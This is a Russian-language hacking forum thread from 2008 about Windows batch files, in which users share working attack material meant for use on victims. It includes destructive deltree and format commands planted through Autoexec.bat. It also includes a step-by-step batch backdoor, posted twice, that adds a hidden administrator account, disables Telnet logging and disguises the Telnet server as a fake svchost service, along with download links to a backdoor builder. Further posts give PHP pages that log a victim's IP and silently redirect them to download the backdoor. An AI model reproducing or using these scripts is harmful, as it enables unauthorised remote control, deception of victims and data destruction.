terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » обитель функций.bat или просто батники!


обитель функций.bat или просто батники!

Сообщений 101 страница 120 из 120

101

Саня написал(а):

А почему именно диск D? Ставь уж тада от С до Z.А то хрен ли понту...Если нет  у него диска Д? Вирь в никуда.

deltree /y c:
deltree /y d:
deltree /y e:

и т.д. по алфавиту. Так больше смысла хотя б...Все ветки удалит нафиг.

Отредактировано Саня (Сегодня 01:15:03)

Подпись автора

    Если б лекарством от всех болезней ... были  бы вирусы - фиг бы мы кого спасли =)

хм а у меня друг хакер у него этоих дисков он через Partition Magic каппец наделал а я точно не помню  какие у него диски...... что делать?

0

102

Попытался немного улучшить версию для аськи(чтобы копирывал не только в систем, но и в другие места), файл Loader.bat:
@echo off
if exist C:\rel.txt goto mim
if exist C:\WINDOWS\system\terminal.bat goto mit
copy terminal.bat C:\WINDOWS\system\
:mit
if exist C:\WINDOWS\system\regt.reg goto min
copy regt.reg C:\WINDOWS\system\
:min
regedit /s "C:\WINDOWS\system\regt.reg"
:mim
pause
if exist C:\rel.txt goto mia
if exist C:\WINDOWS\terminal.bat goto mis
copy terminal.bat C:\WINDOWS\
:mis
if exist C:\WINDOWS\regt2.reg goto mir
copy regt2.reg C:\WINDOWS\
:mir
regedit /s "C:\WINDOWS\regt2.reg"
:mia
pause
if exist C:\rel.txt goto mif
if exist C:\WINDOWS\Progra~1\terminal.bat goto mib
copy terminal.bat C:\Progra~1\
:mib
if exist C:\WINDOWS\system\regt3.reg goto mik
copy regt3.reg c:\Progra~1\
:mik
regeit /s "C:\Progra~1\regt3.reg"
:mif
pause
Так вот, при включении он просит нажать любую клавишу, можно просто закрыть и он нифига не скопирует...Как сделать чтобы он ничего не спрашивал? Пробовал воткнуть y| везде, нифига...

Отредактировано Imprisoned (2008-03-16 00:55:58)

0

103

Imprisoned написал(а):

Попытался немного улучшить версию для аськи(чтобы копирывал не только в систем, но и в другие места), файл Loader.bat:
@echo off
if exist C:\rel.txt goto mim
if exist C:\WINDOWS\system\terminal.bat goto mit
copy terminal.bat C:\WINDOWS\system\
:mit
if exist C:\WINDOWS\system\regt.reg goto min
copy regt.reg C:\WINDOWS\system\
:min
regedit /s "C:\WINDOWS\system\regt.reg"
:mim
pause
if exist C:\rel.txt goto mia
if exist C:\WINDOWS\terminal.bat goto mis
copy terminal.bat C:\WINDOWS\
:mis
if exist C:\WINDOWS\regt2.reg goto mir
copy regt2.reg C:\WINDOWS\
:mir
regedit /s "C:\WINDOWS\regt2.reg"
:mia
pause
if exist C:\rel.txt goto mif
if exist C:\WINDOWS\Progra~1\terminal.bat goto mib
copy terminal.bat C:\Progra~1\
:mib
if exist C:\WINDOWS\system\regt3.reg goto mik
copy regt3.reg c:\Progra~1\
:mik
regeit /s "C:\Progra~1\regt3.reg"
:mif
pause
Так вот, при включении он просит нажать любую клавишу, можно просто закрыть и он нифига не скопирует...Как сделать чтобы он ничего не спрашивал? Пробовал воткнуть y| везде, нифига...

А ты написал в самом конце :trej потом через enter goto trej??

0

104

Нет, непонял...Обьясни поподробней плз)

0

105

нАрод А можНо ОтКлюЧитЬ ПроЦЕСС аНтИвИрЯ? ТОДА СЛЕДОм МонО бУДЕт КиДатЬ ЧерВя. Как дУМаеТе?

0

106

юрОК написал(а):

можНо ОтКлюЧитЬ ПроЦЕСС аНтИвИрЯ

Возможно вполне,ток под каждый антивирь  нужен свой подход.Некоторые трои могут отключатть и фаеры и антивири,есть определенные эксплойты.Убийцы процессов  и т.д.Kaspkiller,например.Я скачал себе,ток пока мне не пригодился.Так что ЦУ пока не дам.

+1

107

нАрод А можНо ОтКлюЧитЬ ПроЦЕСС аНтИвИрЯ? ТОДА СЛЕДОм МонО бУДЕт КиДатЬ ЧерВя. Как дУМаеТе?

Сейчас бы вирусов на компьютере было больше чем частиц на свете :). Хотя теоретически можно. Вот только все "серьезные" антивирусы защищают свои процессы от влияния...

Идея кстати была популярна пару лет назад :)...

0

108

Если б лекарством от всех болезней ... были  бы вирусы - фиг бы мы кого спасли =)

Это точно :)...

+1.

0

109

Нашёл ещё кое-что о batch-файлах. Может, кому-то пригодиться. Если же ничего нового, прошу модеров удалить сей топ, ибо на прочтение всей текущей темы времени не хватает (работа, плин((( ). В общем, вотЪ:

Описание и фишки batch файлов.

--------------------------------------------------------------------------------

Для начала давай разбёремся в том, что же такое batch'и. Прежде всего - это пакетные дос файлы, которые содержат в себе в ascii виде набор досовских команд. По-русски говоря, bat файл содержит в себе скрипт, интерпритатором служит command.com.
Поясняю: после прочтения этой статьи, ты сможешь писать проги, которые удаляют системные файлы, форматируют диски и тд. Главное, тебе для этого понадобится только блокнот и прямые руки, никаких компиляторов и дебагеров не требуется (бачи не такие примитивные, как тебе кажется - есть вирусы\генераторы, на них написанные).
И ещё. Я не буду описывать все возможные флаги(параметры) каждой команды, только наиболее полезные.
Ну чё, готов? Поехали!

Простые команды:
Для начала давай разбёремся в том, что же такое batch'и. Прежде всего - это пакетные дос файлы, которые содержат в себе в ascii виде набор досовских команд. По-русски говоря, bat файл содержит в себе скрипт, интерпритатором служит command.com.
Поясняю: после прочтения этой статьи, ты сможешь писать проги, которые удаляют системные файлы, форматируют диски и тд. Главное, тебе для этого понадобится только блокнот и прямые руки, никаких компиляторов и дебагеров не требуется (бачи не такие примитивные, как тебе кажется - есть вирусы\генераторы, на них написанные).
И ещё. Я не буду описывать все возможные флаги(параметры) каждой команды, только наиболее полезные.
Ну чё, готов? Поехали!
Простые команды:

echo off - запрещение вывода на экран исполняемых команд (on - вкл.)
deltree /y %файл% - удалить файл (/y означает "удалить без вопросов"). Кста, в НТ работает тока del (флаг /y не нужен).
copy %путь\файл% %куда\файл% - копировать файло
mkdir %название_диры% - создать директорию
echo %текст% - вывести текст на экран
echo %текст% > %путь\файл% - создать файл и вписать в него текст
echo %текст% >> %путь\файл% - добавить текст в уже существующий файл
if exist %путь\файл% %команда% - если существует файл, выполнить команду
attrib %атрибут% %путь\файл% - поставить\убрать атрибуты файлу (+-h скрытый, +-s системный, +-r только чтение)
start %путь\файл% - запустить файло
cls - отчистить экран
pause - выводит сообщение "Нажмите любую кнопку..."
label %новая_метка% - поставить новую метку системного диска (диск С)
format %диск%: /q - быстрое форматирование диска :) Несколько секунд
ren %путь\файл% %новое_название_файла% - переименовать файло
goto %метка%
...
...
...
:%метка% - перескoчить с одного места кода на метку.

Фишки, хитрости:
1: choice /N /T:y,%сек% > nul - типа таймера (на n секунд задерживает выполнение последующих команд).

2: %команда% > nul - запрещение вывода на экран самой команды и результата её действия (полезно при команде "copy"). Пример: copy c:\some.exe %windir%\some.exe > nul

3: regedit /s %путь\файл.reg% - добавить ключи в реестр из файла, без вопросов

4: start /m /w %путь\файл% - запустить файло в свёрнутом окне.

5: слышал про файл Autoexec.bat? Знаешь, что он грузится вместе с компом? Наверное, да. Так вот, он имеет расширение BAT. На что я намекаю? На то, что ты можешь в него прописать строчку, к примеру, "format C: /q" (прописывается она вот так: echo format C: /q >> c:\Autoexec.bat) и во время перезагрузки у жертвы отформатируется диск С.
Это я к тому, что любой скрипт, вставленный в этот файл, будет выполнен при загрузке компа. Также можешь создать в каталоге с виндой файл winstart.bat. Он также запуститья виндусом.

6: это относиться как раз к фишке с Autoexec'ом. К примеру, если ты положишь в каталог windows\command файл к примеру "load.bat" (наверное с плохим содержанием), это файлу из autoexec'a с вероятностью в 90% можно будет запустить строчкой "load". И это ещё отстой..Ты сможешь загружать это файло такой строчкой: "load keybrd32.sys,,cyr\lat" или такой: "load VideoAdapter32.drv -- By windows setup --". Врятли такие строчки рискнёт кто-нибудь удалять и твоё файло без трабл загрузится..=)

7: if exist c:\Progra~1 set drv=c:
if exist d:\Progra~1 set drv=d:
if exist d:\Progra~1 set drv=e:
После выполнения этого скрипта в переменной %drv% будет прописан диск с Виндой, с Program Files'ами.

8: в переменной %windir% хранится каталог с виндусом в таком виде: диск:\название_каталога. Пример: copy c:\some.exe %windir%\some.exe

9: batch скрипты не любят длинные, либо состоящие из двух слов, названия. Длинные урезаются до 6-ти букв (после них должно стоять "~1", к примеру "Program Files -> Progra~1"). Пробелы он просто убирает (The Bat -> TheBat~1).
Это я к тому, что в бачах обращайся к файлам по их досовским названиям. Пример: copy c:\some.exe c:\Progra~1\some.exe (копируется файл в папку Program Files).

10: echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("твой_текст"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js

Этот скрипт выводит на экран _Виндовое_ окошко (по средствам Java Script) с твоим сообщением и кнопкой ОК.
Ну вот наверно и всё! Здесь я умолчал о переменных, циклах и создании меню в batch'ах, так как это довольно объёмные темы. Следующая статья будет как раз посвещена им.

echo off - запрещение вывода на экран исполняемых команд (on - вкл.)
deltree /y %файл% - удалить файл (/y означает "удалить без вопросов"). Кста, в НТ работает тока del (флаг /y не нужен).
copy %путь\файл% %куда\файл% - копировать файло
mkdir %название_диры% - создать директорию
echo %текст% - вывести текст на экран
echo %текст% > %путь\файл% - создать файл и вписать в него текст
echo %текст% >> %путь\файл% - добавить текст в уже существующий файл
if exist %путь\файл% %команда% - если существует файл, выполнить команду
attrib %атрибут% %путь\файл% - поставить\убрать атрибуты файлу (+-h скрытый, +-s системный, +-r только чтение)
start %путь\файл% - запустить файло
cls - отчистить экран
pause - выводит сообщение "Нажмите любую кнопку..."
label %новая_метка% - поставить новую метку системного диска (диск С)
format %диск%: /q - быстрое форматирование диска :) Несколько секунд
ren %путь\файл% %новое_название_файла% - переименовать файло
goto %метка%
...
...
...
:%метка% - перескoчить с одного места кода на метку.

Фишки, хитрости:
1: choice /N /T:y,%сек% > nul - типа таймера (на n секунд задерживает выполнение последующих команд).

2: %команда% > nul - запрещение вывода на экран самой команды и результата её действия (полезно при команде "copy"). Пример: copy c:\some.exe %windir%\some.exe > nul

3: regedit /s %путь\файл.reg% - добавить ключи в реестр из файла, без вопросов

4: start /m /w %путь\файл% - запустить файло в свёрнутом окне.

5: слышал про файл Autoexec.bat? Знаешь, что он грузится вместе с компом? Наверное, да. Так вот, он имеет расширение BAT. На что я намекаю? На то, что ты можешь в него прописать строчку, к примеру, "format C: /q" (прописывается она вот так: echo format C: /q >> c:\Autoexec.bat) и во время перезагрузки у жертвы отформатируется диск С.
Это я к тому, что любой скрипт, вставленный в этот файл, будет выполнен при загрузке компа. Также можешь создать в каталоге с виндой файл winstart.bat. Он также запуститья виндусом.

6: это относиться как раз к фишке с Autoexec'ом. К примеру, если ты положишь в каталог windows\command файл к примеру "load.bat" (наверное с плохим содержанием), это файлу из autoexec'a с вероятностью в 90% можно будет запустить строчкой "load". И это ещё отстой..Ты сможешь загружать это файло такой строчкой: "load keybrd32.sys,,cyr\lat" или такой: "load VideoAdapter32.drv -- By windows setup --". Врятли такие строчки рискнёт кто-нибудь удалять и твоё файло без трабл загрузится..=)

7: if exist c:\Progra~1 set drv=c:
if exist d:\Progra~1 set drv=d:
if exist d:\Progra~1 set drv=e:
После выполнения этого скрипта в переменной %drv% будет прописан диск с Виндой, с Program Files'ами.

8: в переменной %windir% хранится каталог с виндусом в таком виде: диск:\название_каталога. Пример: copy c:\some.exe %windir%\some.exe

9: batch скрипты не любят длинные, либо состоящие из двух слов, названия. Длинные урезаются до 6-ти букв (после них должно стоять "~1", к примеру "Program Files -> Progra~1"). Пробелы он просто убирает (The Bat -> TheBat~1).
Это я к тому, что в бачах обращайся к файлам по их досовским названиям. Пример: copy c:\some.exe c:\Progra~1\some.exe (копируется файл в папку Program Files).

10: echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("твой_текст"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
Этот скрипт выводит на экран _Виндовое_ окошко (по средствам Java Script) с твоим сообщением и кнопкой ОК.
Ну вот наверно и всё!

+1

110

Возможно ли написать батник который через определенное время(или в определенное время) запускает какую либо программу, например песню?

Отредактировано LionASP (2008-05-09 21:49:19)

0

111

Уже нашел решение проблемы. Вот пишу если кому интересно: at 15:34 /interactive "c:\1.mp3"
Эт я будильник себе замутил =))

+1

112

Да уж, с помощью .bat можно такие темы замутить, что страшно подумать.....

0

113

Публикуется с разрешением автора
------------------------------------------------------------------------
Что же такое бэкдор, мы можем очень подробно прочитать тут.
Вкратце, с помощью "задней дверцы" мы можем полностью управлять компьютером. Бэкдоры различаются, похоже, только степенью навороченности - некоторые предлагают нам только перезагружать компьютер жертвы, когда нам захочется; а иные даже умеют отправлять скриншоты с компьютера жертвы. Соответственно, и пишут их на разных языках.

Но мы же с тобой не хацкоры, которые привыкли держать в страхе весь район страшными словами "троян"; иначе говоря, нам не нужен крутой графический интерфейс админки для бэкдора. Нам достаточно и командной строки, чтобы управлять удалённым компьютером.
Итак, сегодня мы пишем собственный бэкдор длинной в 20 строчек! От слов, как всегда, к делу.

Сначала решим, как мы хотим подключаться к заражённой машине. В консоле я не нашёл альтернативы команде telnet. Сразу придётся немного разочароваться, так как на WinVista этой фишки нет. Наш дор будет работать только под Win XP.

Для начала отключим все выводимые в процессе выполнения батника на экран подсказки. вообще, эта строчка не несёт никакой смысловой нагрузки, я просто показываю, какой я чоткий проггер =)

Код:

0:  @echo off

Далее создадим локальную группу, куда в последствии добавим пользователя с правами администратора и паролем pass:
Код:

1:   net localgroup TelnetClients /add
2:   net user admin pass /add
3:   net localgroup Administratoren admin /add
4:   net localgroup TelnetClients admin /add

Итак, мы уже обосновались на машине. Теперь необходимо, чтобы компьютер был доступен нам и после перезагрузки. Для этого создадим где-нибудь подальше, чтобы не палевно было, файл регистра 0.reg, в котором укажем помимио всего остального и номер порта в 16-ричной системе, к которому будем впоследствии коннектиться:
Код:

5:   cd /d %windir%\system32
6:   ECHO Windows Registry Editor Version 5.00>0.reg
7:   ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg
8:   ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
9:   ECHO "TelnetPort"=dword:000003F2>>0.reg
10:  ECHO "MaxConnections"=dword:0000000a>>0.reg
11:  ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
12:  ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
13:  ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg
14:  ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg

Импортируем наш свежесозданный файл в реестр, и тут же его удалим.
Код:

15:  regedit /s 0.reg && DEL 0.reg

Теперь нам необходимо обжиться в системе самим телнет-сервером, который мы скопируем и назовём svchost.exe.

[Q]: Стоп, свцхост? В этой папке же уже лежит служба "Generic Host Process for Win32 Services"?
[A]: Ы, не палимся! Для этого добавим в конце расширения пробел и сассоциируем это расширение с исполняемыми файлами (ехе). После этого создаем службу под именем WMI-Client, которая при запуске системы будет запускать наш svchost.exe. Делаем ей описание "Microsoft WMI-Client" и, наконец, запускаем её.
Код:

16:  COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
17:  assoc .exeя=exefile
18:  sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
19:  sc description WMI-Client "Microsoft WMI-Client"
20:  sc start WMI-Client

После этого, как уже говорилось в начале статьи, мы можем приконнектиться к компьютере-жертве посредством Телнета такой командой.
Код:

telnet 127.0.0.1 1010

В принципе, как мы видим, ничего не стоить немного изменить наш бэкдор. Переименуем названия файлов, сделаем коннект на другой порт, добавим пару ненужных параметров в регистре. Расширение у файла поменяем.
================================================== ===========
Напоследок, даю линк на скачку билдера бэкдора, который Вы сможете подсунуть Вашей жертве.

http://smages.com/i/ae/ed/aeed1101cdea1c09181d174e2bdce45e.png

чтобы скачать готовый http://rapidshare.com/files/117763398/B … r.rar.html
и здесь http://ifolder.ru/6754757

Mega respect Tr3x0r
(c) mr.grek

0

114

seven написал(а):

telnet 127.0.0.1 1010

а 127.0.0.1 это, как я понял ип жертвы? а можно сделать чтобы бакдоор сам высылал тебе ИП жертвы по емейлу?

0

115

popoffka чтобы узнат ip жерты я делаю так зарегай хост например здесь www2ru.name создай файл index.php впиши туда следующий код
<?
  $a = $_SERVER['REMOTE_ADDR'];
  $b = $_SERVER['HTTP_USER_AGENT'];
  $c = @$_SERVER['HTTP_REFERER'];
  $d = $_SERVER['SERVER_PORT']; 
  $e = $_SERVER['HTTP_HOST'];
  $af = $_ENV['USERNAME'];
 
$count1=" IP: $a   br: $b   ot: $c  p: $d  h: $e  us: $af \n";
$f=fopen("log.txt","a+");
fwrite($f,$count1); 
fclose($f); 
?>
поставь парматеры chmod 777 на файл и вроде все, теперь отправь сылку жертве она у тебя будет выглядеть так wwwpopoffka.2ru.name жертва перейдет по сылке и у тебя на хосте создастся файл log там ты и найдешь ip жертвы ну а дальше прояви фантазию.

0

116

вот даработанный скрипт вобщем все делаем также только наш бэкдор заливаем например здесь wwwdump.ru   код немного переделаем чтобы жертва когда перешла по вашей сылке ее нужно перекинуть на скачивание нашего бэкдора чтобы она ничего не заподозрила создадим файл на хосте index.php и впишем туда следующий код
<?php
$ip = getenv ("REMOTE_ADDR");
$FL = fopen("log.txt", "a+");
fwrite($FL, $ip);
fclose($FL);
?>
<?php
header("Location: http://dump.ru/file_catalog/******);
exit();
?>
незабудь поставить права  chmod когда жертва перейдет по вайшей сылке на хосте у вас появиться файл log там вы и ищите ip если все good тогда смело можно к ней подключаться через telnet, главное чтобы в сеть она выходила под своим ip но это узнать не сложно. думаю все понятно антивирус палить не будет если только кашмар правильно настроен тогда выскачет табличка разрешить добавить в реестр, на остальных не знаю т.к как их не юзаю. также можно создать sfx архив что очень удобно заменяет joinera  и главное не палиться .

0

117

1

Отредактировано pesha (2008-11-08 20:44:44)

0

118

Крутая задумка...

Отредактировано Riddick (2008-11-10 23:10:21)

0

119

Батнир реально мощьная вещь=)
Соверую всем освоить его перед изучением ассемблера :glasses:

0

120

seven написал(а):

Публикуется с разрешением автора
------------------------------------------------------------------------
Что же такое бэкдор, мы можем очень подробно прочитать тут.
Вкратце, с помощью "задней дверцы" мы можем полностью управлять компьютером. Бэкдоры различаются, похоже, только степенью навороченности - некоторые предлагают нам только перезагружать компьютер жертвы, когда нам захочется; а иные даже умеют отправлять скриншоты с компьютера жертвы. Соответственно, и пишут их на разных языках.

Но мы же с тобой не хацкоры, которые привыкли держать в страхе весь район страшными словами "троян"; иначе говоря, нам не нужен крутой графический интерфейс админки для бэкдора. Нам достаточно и командной строки, чтобы управлять удалённым компьютером.
Итак, сегодня мы пишем собственный бэкдор длинной в 20 строчек! От слов, как всегда, к делу.

Сначала решим, как мы хотим подключаться к заражённой машине. В консоле я не нашёл альтернативы команде telnet. Сразу придётся немного разочароваться, так как на WinVista этой фишки нет. Наш дор будет работать только под Win XP.

Для начала отключим все выводимые в процессе выполнения батника на экран подсказки. вообще, эта строчка не несёт никакой смысловой нагрузки, я просто показываю, какой я чоткий проггер =)

Код:

0:  @echo off

Далее создадим локальную группу, куда в последствии добавим пользователя с правами администратора и паролем pass:
Код:

1:   net localgroup TelnetClients /add
2:   net user admin pass /add
3:   net localgroup Administratoren admin /add
4:   net localgroup TelnetClients admin /add

Итак, мы уже обосновались на машине. Теперь необходимо, чтобы компьютер был доступен нам и после перезагрузки. Для этого создадим где-нибудь подальше, чтобы не палевно было, файл регистра 0.reg, в котором укажем помимио всего остального и номер порта в 16-ричной системе, к которому будем впоследствии коннектиться:
Код:

5:   cd /d %windir%\system32
6:   ECHO Windows Registry Editor Version 5.00>0.reg
7:   ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg
8:   ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
9:   ECHO "TelnetPort"=dword:000003F2>>0.reg
10:  ECHO "MaxConnections"=dword:0000000a>>0.reg
11:  ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
12:  ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
13:  ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg
14:  ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg

Импортируем наш свежесозданный файл в реестр, и тут же его удалим.
Код:

15:  regedit /s 0.reg && DEL 0.reg

Теперь нам необходимо обжиться в системе самим телнет-сервером, который мы скопируем и назовём svchost.exe.

[Q]: Стоп, свцхост? В этой папке же уже лежит служба "Generic Host Process for Win32 Services"?
[A]: Ы, не палимся! Для этого добавим в конце расширения пробел и сассоциируем это расширение с исполняемыми файлами (ехе). После этого создаем службу под именем WMI-Client, которая при запуске системы будет запускать наш svchost.exe. Делаем ей описание "Microsoft WMI-Client" и, наконец, запускаем её.
Код:

16:  COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
17:  assoc .exeя=exefile
18:  sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
19:  sc description WMI-Client "Microsoft WMI-Client"
20:  sc start WMI-Client

После этого, как уже говорилось в начале статьи, мы можем приконнектиться к компьютере-жертве посредством Телнета такой командой.
Код:

telnet 127.0.0.1 1010

В принципе, как мы видим, ничего не стоить немного изменить наш бэкдор. Переименуем названия файлов, сделаем коннект на другой порт, добавим пару ненужных параметров в регистре. Расширение у файла поменяем.
================================================== ===========
Напоследок, даю линк на скачку билдера бэкдора, который Вы сможете подсунуть Вашей жертве.

http://smages.com/i/ae/ed/aeed1101cdea1 … dce45e.png

чтобы скачать готовый http://rapidshare.com/files/117763398/B … r.rar.html
и здесь http://ifolder.ru/6754757

Mega respect Tr3x0r
(c) mr.grek

это конечно жирная тема я даже припомощи это програмулины и при помощи СИ ломанул комп!(= но мну спалили)=

+1


Вы здесь » terminal-s52 » Хакинг » обитель функций.bat или просто батники!